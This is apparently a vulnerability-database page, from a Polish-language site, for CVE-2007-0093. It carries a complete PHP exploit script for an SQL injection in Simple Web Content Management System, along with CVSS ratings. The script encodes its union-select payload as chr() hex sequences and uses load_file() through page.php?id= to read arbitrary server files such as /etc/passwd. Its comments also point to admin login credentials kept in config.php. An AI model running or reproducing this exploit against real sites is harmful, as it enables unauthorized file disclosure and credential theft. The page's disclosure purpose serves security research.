Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Simple Web Content Management System SQL Injection Exploit
2007.01.07
Credit:
DarkFig
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2007-0093
CWE:
CWE-89
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
#!/usr/bin/php <?php /** * This file require the PhpSploit class. * If you want to use this class, the latest * version can be downloaded from acid-root.new.fr. **/ require("phpsploitclass.php"); if($argc < 3) { print(" -------------------------------------------------------- Affected.scr..: Simple Web Content Management System Poc.ID........: 18070102 Type..........: SQL Injection Risk.level....: Medium Src.download..: www.cms-center.com Poc.link......: acid-root.new.fr/poc/18070102.txt Credits.......: DarkFig -------------------------------------------------------- Usage.........: php xpl.txt <url> <file> Options.......: <proxhost:proxport> <proxuser:proxpass> Example.......: php xpl.txt http://hihi.org/ /etc/passwd --------------------------------------------------------n"); exit(1); } $url =$argv[1];$file =$argv[2]; $proxh=$argv[3];$proxa=$argv[4]; $xpl = new phpsploit(); $xpl->agent("Mozilla"); if($proxh) $xpl->proxy($proxh); if($proxa) $xpl->proxyauth($proxa); /* * $id = $_GET['id']; * $query = "SELECT * from content WHERE id = $id"; * ... * @return $row->text; * * Simple SQL injection (register_globals=off ; magic_quotes_gpc=on). * What we want is not in the database, it's in a file (config.php): * * //this are the logins for the admin part. Change them for security. * $login = "test"; //your login for the admin section. * $pass = "1234"; //your login for the admin section. * * PS: Les chr() ont t utiliss dans le but de se foutre de * la gueule des personnes l'utilisant seulement pour d4 h4x0r styl3 =). * */ $header = chr(0x2f).chr(0x3c).chr(0x68).chr(0x74).chr(0x6d).chr(0x6c).chr(0x3e).ch r(0x0d). chr(0x0a).chr(0x3c).chr(0x68).chr(0x65).chr(0x61).chr(0x64).chr(0x3e).ch r(0x0d). chr(0x0a).chr(0x3c).chr(0x74).chr(0x69).chr(0x74).chr(0x6c).chr(0x65).ch r(0x3e). chr(0x63).chr(0x6f).chr(0x6e).chr(0x74).chr(0x65).chr(0x6e).chr(0x74).ch r(0x66). chr(0x72).chr(0x61).chr(0x6d).chr(0x65).chr(0x3c).chr(0x5c).chr(0x2f).ch r(0x74). chr(0x69).chr(0x74).chr(0x6c).chr(0x65).chr(0x3e).chr(0x0d).chr(0x0a).ch r(0x3c). chr(0x6c).chr(0x69).chr(0x6e).chr(0x6b).chr(0x20).chr(0x68).chr(0x72).ch r(0x65). chr(0x66).chr(0x3d).chr(0x22).chr(0x5c).chr(0x2f).chr(0x73).chr(0x74).ch r(0x79). chr(0x6c).chr(0x65).chr(0x2e).chr(0x63).chr(0x73).chr(0x73).chr(0x22).ch r(0x20). chr(0x72).chr(0x65).chr(0x6c).chr(0x3d).chr(0x22).chr(0x73).chr(0x74).ch r(0x79). chr(0x6c).chr(0x65).chr(0x73).chr(0x68).chr(0x65).chr(0x65).chr(0x74).ch r(0x22). chr(0x20).chr(0x74).chr(0x79).chr(0x70).chr(0x65).chr(0x3d).chr(0x22).ch r(0x74). chr(0x65).chr(0x78).chr(0x74).chr(0x5c).chr(0x2f).chr(0x63).chr(0x73).ch r(0x73). chr(0x22).chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x6d).chr(0x65).ch r(0x74). chr(0x61).chr(0x20).chr(0x68).chr(0x74).chr(0x74).chr(0x70).chr(0x2d).ch r(0x65). chr(0x71).chr(0x75).chr(0x69).chr(0x76).chr(0x3d).chr(0x22).chr(0x43).ch r(0x6f). chr(0x6e).chr(0x74).chr(0x65).chr(0x6e).chr(0x74).chr(0x2d).chr(0x54).ch r(0x79). chr(0x70).chr(0x65).chr(0x22).chr(0x20).chr(0x63).chr(0x6f).chr(0x6e).ch r(0x74). chr(0x65).chr(0x6e).chr(0x74).chr(0x3d).chr(0x22).chr(0x74).chr(0x65).ch r(0x78). chr(0x74).chr(0x5c).chr(0x2f).chr(0x68).chr(0x74).chr(0x6d).chr(0x6c).ch r(0x3b). chr(0x20).chr(0x63).chr(0x68).chr(0x61).chr(0x72).chr(0x73).chr(0x65).ch r(0x74). chr(0x3d).chr(0x69).chr(0x73).chr(0x6f).chr(0x2d).chr(0x38).chr(0x38).ch r(0x35). chr(0x39).chr(0x2d).chr(0x31).chr(0x22).chr(0x3e).chr(0x0d).chr(0x0a).ch r(0x3c). chr(0x5c).chr(0x2f).chr(0x68).chr(0x65).chr(0x61).chr(0x64).chr(0x3e).ch r(0x0d). chr(0x0a).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x62).chr(0x6f).chr(0x64).ch r(0x79). chr(0x3e).chr(0x2f); $sql = chr(0x70).chr(0x61).chr(0x67).chr(0x65).chr(0x2e).chr(0x70).chr(0x68).ch r(0x70). chr(0x3f).chr(0x69).chr(0x64).chr(0x3d).chr(0x2d).chr(0x31).chr(0x2f).ch r(0x2a). chr(0x2a).chr(0x2f).chr(0x75).chr(0x6e).chr(0x69).chr(0x6f).chr(0x6e).ch r(0x2f). chr(0x2a).chr(0x2a).chr(0x2f).chr(0x73).chr(0x65).chr(0x6c).chr(0x65).ch r(0x63). chr(0x74).chr(0x2f).chr(0x2a).chr(0x2a).chr(0x2f).chr(0x6e).chr(0x75).ch r(0x6c). chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).ch r(0x6e). chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).ch r(0x6c). chr(0x2c).chr(0x6c).chr(0x6f).chr(0x61).chr(0x64).chr(0x5f).chr(0x66).ch r(0x69). chr(0x6c).chr(0x65).chr(0x28).chr(0x63).chr(0x6f).chr(0x6e).chr(0x63).ch r(0x61). chr(0x74).chr(0x28).concatcharfu($file).chr(0x29).chr(0x29).chr(0x2c).ch r(0x6e). chr(0x75).chr(0x6c).chr(0x6c).chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).ch r(0x6c). chr(0x2c).chr(0x6e).chr(0x75).chr(0x6c).chr(0x6c); $footer = chr(0x2f).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x62).chr(0x6f).chr(0x64).ch r(0x79). chr(0x3e).chr(0x0d).chr(0x0a).chr(0x3c).chr(0x5c).chr(0x2f).chr(0x68).ch r(0x74). chr(0x6d).chr(0x6c).chr(0x3e).chr(0x2f); $xpl->get($url.$sql); $ct = preg_replace($footer,'',$xpl->getcontent()); print preg_replace($header,'',$ct); function concatcharfu($file) { $dat = ''; for($i=0;$i<strlen($file);$i++) { $dat .= 'char('.ord($file[$i]).')'; if($i != (strlen($file)-1)) $dat .= ','; } return $dat; } ?>
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top